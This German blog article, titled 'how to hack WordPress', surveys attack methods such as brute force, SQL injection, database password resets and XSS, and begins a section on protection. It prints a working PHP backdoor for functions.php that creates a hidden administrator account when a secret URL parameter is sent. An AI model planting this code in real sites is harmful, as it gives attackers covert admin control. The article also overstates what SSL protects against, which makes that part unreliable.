Wie hackt man WordPress?
## Intro Bevor wir mit diesem Artikel beginnen, möchten wir Sie darauf hinweisen, dass Hacken illegal ist und dass wir nicht zu böswilligen Aktivitäten motivieren oder diese unterstützen. Dieser Artikel dient einzig und allein dazu, Wissen darüber zu erlangen, wie Betrüger arbeiten und wie verschiedene Methoden der Website-Sicherheit wesentlich sind, um sie in Schach zu halten. Lassen Sie uns diskutieren: - Wie hacken Betrüger WordPress? - Wie kann man seine WP-Website vor Betrügern schützen? Fangen wir also ohne Umschweife mit dem Thema an. ## Wie hackt man eine WordPress-Website online? Wie hacke ich eine WordPress-Website online?(hack-into-a-wordpress-website.jpg) (Quelle: [wpsecurityninja.com](https://wpsecurityninja.com/hack-into-wordpress-website/)) ### WPScan verwenden: [WPScan](https://wpscan.com/wordpress-security-scanner) ist ein WP-Sicherheitsscanner, der Website-Besitzern dabei hilft, ihre WordPress-Website auf Schwachstellen zu überprüfen, aber dieser Scanner wird auch von Hackern genutzt, um ihre Motive zum Hacken von Websites zu erfüllen. WPScan ermöglicht es Website-Besitzern und Administratoren, WP-Benutzerkonten und Brute-Force-Passwörter festzulegen, die der erste Schritt sind, um unbefugten Zugriff auf WP-Konten zu erhalten.  (Brute-Force-Benutzername und -Passwort mit WPScan. Quelle: [Medium](https://medium.com/@hninja049/how-to-hack-a-wordpress-website-8ab01140ba43)) ### MIM-Angriffe: Man-in-Middle (MIM)-Angriffe können leicht durchgeführt werden, wenn die Benutzer ähnliche LANs verwenden. Unverschlüsselte Benutzeranmeldungen sind ein leichtes Ziel, da alle Details im Klartext sichtbar sind. Die Software, die diese Art von Angriffen durchführt, kann kompromittierte Themes und Plugins erkennen und die Benutzer aufzählen.  (Quelle: [Medium](https://medium.com/@hninja049/how-to-hack-a-wordpress-website-8ab01140ba43)) ### SQL-Injektionen: SQL-Injection-Angriffe gelten als die bekanntesten Angriffe, mit denen in Websites eingedrungen wird. Diese Angriffe zielen auf die Backend-Gateways der Website ab und ermöglichen es Hackern, durch die Implementierung kompromittierter Befehle in diese einzudringen.  (Quelle: [secure.wphackedhelp.com](https://secure.wphackedhelp.com/blog/hack-wordpress-website/#How_To_Hack_A_WordPress_Website_8211_Various_Ways)) Diese Eindringlinge ermöglichen es den Hackern auch, Datenbanken und Befehle zu ändern und Website-Informationen zu löschen oder zu stehlen. Da diese SQL-Angriffe verwundbare und nicht gepatchte Websites ausfindig machen, machen sie die Hacking-Aufgabe einfach und erfolgreich. ### Verwendung von My SQL/cPanel: Bei dieser Methode erstellen Hacker ein gefälschtes Konto oder ändern das Passwort eines aktuellen Nutzers einer WP-Website. Die Hacker versuchen, über das cPanel einzudringen, indem sie PhpMyAdmin öffnen. Sie suchen nach der Tabelle, die auf _users endet, und finden den Benutzer, den sie ändern wollen. So können sie die Anmeldedaten des Benutzers ändern, den sie hacken wollen. Sie machen den Benutzer ausfindig und ändern sein Kennwort (aus dem Feld user_pass), indem sie den [Online-MD5-Generator](https://www.md5.cz/) öffnen, das Kennwort durch das gewünschte ersetzen und anschließend auf # klicken.  (Benutzernamen, gehashte Passwörter der Benutzer, ihre E-Mail-IDs usw. sind alle in der Datenbanktabelle wp_users gespeichert. Quelle: [firstsiteguide.com](https://firstsiteguide.com/hack-wordpress-complete-guide/)) Benutzernamen, gehashte Passwörter, E-Mail-IDs usw. werden alle in der Datenbanktabelle wp_users gespeichert. ### Editieren von Functions.php: Hacker greifen auch auf das cPanel zu, um die Datei "Functions.php" zu ändern. Indem sie den Dateimanager entsperren, suchen sie nach dem Ordner des aktiven Themes. Vom Ordner public_html/wp_content/themes aus verfolgen sie das Theme und bearbeiten die functions.php, indem sie ihren kompromittierten Code platzieren. Das Hacken ist bereits im Gange, da die Hacker ein neues Konto erstellt haben. Sobald dies geschehen ist, löschen sie den kompromittierten Code. ### Erstellen Sie ein neues Benutzerkonto per FTP: FTP-Konten helfen Website-Besitzern im Allgemeinen, ein Verzeichnis auf ihrer Website zu erstellen, das es bestimmten Benutzern ermöglicht, ihre Dateien mit ihren Anmeldedaten hoch- oder herunterzuladen. Diese Dateien können auch im Internet eingesehen werden. > **Schritte zur Erstellung eines FTP-Accounts auf der Website:** > > - Geben Sie die gewünschten Daten ein > - Geben Sie den Benutzernamen des neuen FTP-Benutzers ein > - Geben Sie das Passwort für die Zuweisung des FTP-Zugangs ein > - Geben Sie den Namen des Verzeichnisses ein, auf das Sie per FTP zugreifen möchten > - Geben Sie den gewünschten MB-Speicherplatz an, den Sie diesem Ordner zuweisen möchten > - Drücken Sie anschließend die Schaltfläche *"Erstellen "*, um das neue Konto zu erstellen. Die unten aufgeführten Daten müssen vom neuen Benutzer geladen werden, um Zugang über FTP zu erhalten. ``` Adresse / Hostname / Anschrift: ihredomain.de oder ftp.ihredomain.de Benutzer / User: user@yourdomain.com Passwort: Das diesem FTP-Konto zugewiesene Passwort ``` **Port: 21** Benennen Sie den Ordner für den Upload/Download von Dateien. ``` Der neue Benutzer hat Lese- und Schreibrechte sowohl für das gewählte Verzeichnis als auch für alle darin enthaltenen Unterverzeichnisse. Wenn Sie zum Beispiel einen Client-Benutzer anlegen und ihm Zugriff auf das Verzeichnis / home / user / public_html geben ``` ### Eindringen durch Backdoor: Ein bösartiger Weg, in die Website einzudringen, führt über die Backdoor. Sei es ein Betrüger, der sich Zugang zu Ihrer Website verschaffen will, oder der Benutzer des Opfers, der über eine Backdoor wieder Zugang zu seiner Website erlangen will, beide müssen die folgenden Schritte befolgen. In Fällen, in denen ein neues Benutzerkonto per FTP erstellt oder ein Passwort zurückgesetzt wurde, dies aber nicht zu den gewünschten Ergebnissen führt, möchte der Benutzer möglicherweise seine Website über eine Backdoor hacken und seinen Admin-Zugang wiederherstellen. **Schritte zum Erstellen einer Backdoor:** - Öffnen Sie die Datei functions.php und fügen Sie den unten stehenden Code ein. ```php add_action('wp_head', 'wploop_backdoor'); function wploop_backdoor() { If ($_GET['backdoor'] == 'knockknock') { require('wp-includes/registration.php'); If (!username_exists('username')) { $user_id = wp_create_user('name', 'pass'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?> ``` - Spätere Änderungen speichern. ### Crypto Jacking & Cryptocurrency Mining: Die Beliebtheit von Kryptowährungen hat zu neuen Cyber-Bedrohungen wie [Crypto-Jacking](https://en.wikipedia.org/wiki/Cryptojacking) geführt, das auch als Cryptocurrency-Mining-Malware bezeichnet wird. Die Beschlagnahmung eines Computers gegen den Willen und das Bewusstsein des Benutzers wird als Crypto-Jacking bezeichnet. Bei Crypto-Jacking-Malware infizieren die Betrüger den Computer des Benutzers mit bösartiger Malware, die über Software zur Kompromittierung von Systemen und Netzwerken bereitgestellt wird. ### Phishing: Phishing ist eine Methode, bei der Betrüger Benutzern ihre sensiblen Daten (Anmeldedaten, Sozialkontonummer, PIN, Kreditkartendaten usw.) entlocken, indem sie sich als juristische Personen ausgeben. Sie nutzen in der Regel E-Mails, um ihren Zweck zu erfüllen. > **Beispiel:** Ein Betrüger kann sich als zuverlässige Quelle ausgeben und persönliche Daten von Benutzern sammeln, um ihre Wünsche zu erfüllen. > Sie können auch einen [schlechten Link](/blog/complete-guide-to-cleaning-up-your-bad-backlinks/) in die Phishing-E-Mail einfügen und sie zu einer betrügerischen Website leiten, um Malware zu liefern. ### Malware: *[WordPress-Sicherheitsstatistiken](https://wpclipboard.com/wordpress-statistics-infographic/) zeigen, dass 4000 WP-Websites durch Malware aufgrund von gefälschten SEO-Plugins infiziert sind. Betrüger brauchen keine Quelle, um Malware zu verbreiten. SEO-Plugins, WP-Themes und viele andere Faktoren, die auf der Website vorhanden sind, haben Hacker dazu veranlasst, die aktuelle WP-VCD-Malware zu verwenden. Selbst Phishing-E-Mails sind ein Einfallstor für Malware. Auch hier ist das Motto der Hacker dasselbe, nämlich durch Eindringen in Systeme und Stehlen von Informationen an sensible Daten von Benutzern zu gelangen. ### WordPress Ransomware: Bei WP-Ransomware setzen Hacker Malware ein, um den Benutzerzugang zu Systemen und Netzwerken zu blockieren. Der Benutzer kann diesen wiederherstellen, indem er das vom Hacker geforderte Lösegeld bezahlt. **Beispiel:** Der [Petya-Angriff](https://en.wikipedia.org/wiki/Petya_(Malware)), bei dem der Hacker Ihre Dateien und Daten verschlüsselt und Lösegeld für den Entschlüsselungsschlüssel verlangt. ### Cross-Site Scripting (XSS)-Angriff: XSS-Angriffe werden von Hackern durchgeführt, indem sie bösartige Inhalte in die Website einschleusen und so den Browser ausnutzen. Dieser Angriff ermöglicht es dem Hacker, Daten aus Cookies zu stehlen, den Inhalt der Website zu verändern und die Website zu kapern, um an sensible Daten zu gelangen. ### Clickjacking: Beim Clickjacking versucht der Hacker in böser Absicht, eine Schaltfläche/einen Link zu kompromittieren und den Benutzer dazu zu bewegen, auf das kompromittierte Objekt zu klicken. Auf diese Weise kann der Hacker bösartige Befehle ausführen, um Zugriff auf sensible Benutzerdaten zu erhalten. ### Spoofing: Spoofing ist ein Angriff, bei dem sich eine Person als vertrauenswürdige Identität tarnt, um dem Benutzer illegale Vorteile zu verschaffen und ihn zur Weitergabe seiner vertraulichen Daten zu verleiten. Um all diese Hackerangriffe zu verhindern, müssen spezielle Sicherheitsmaßnahmen getroffen werden, um Ihre WP-Website zu schützen. ## Wie kann man eine WordPress-Website vor Hacking schützen? Wie schützt man eine WordPress-Website vor Hackerangriffen?(spoofing.jpg) (Quelle: [envisagedigital.co.uk](https://www.envisagedigital.co.uk/wordpress-market-share/)) Die obigen Statistiken zeigen die Beliebtheit von WordPress. Diese Beliebtheit macht diese CMS-Plattform bei Hackern, die mit verschiedenen Methoden versuchen, sich Zugang zu WP-Websites und ihren Daten zu verschaffen, besonders begehrt. Daher ist es wichtig zu wissen, wie Sie den Zugriff von Hackern auf Ihre WP-Website verhindern können. ### Sichern Sie Ihre WP-Website mit einem SSL-Zertifikat: Wenn Daten auf die Website geladen werden, geschieht dies immer im Klartext, der für alle, auch für Hacker, leicht sichtbar ist. Dies kann riskant sein, da Hacker die Daten Ihrer Website missbrauchen können. SSL *(Secure Socket Layers)*-Zertifikate sind digitale Zertifikate, die Ihre WP-Site mit einer 256-Bit-Verschlüsselung sichern und so die Daten Ihrer Site in ein verschlüsseltes Format umwandeln. Hacker können die Codes nicht lesen, obwohl sie Zugang zu Ihrer Website erhalten haben, und sind daher gezwungen, solche Websites zu verlassen.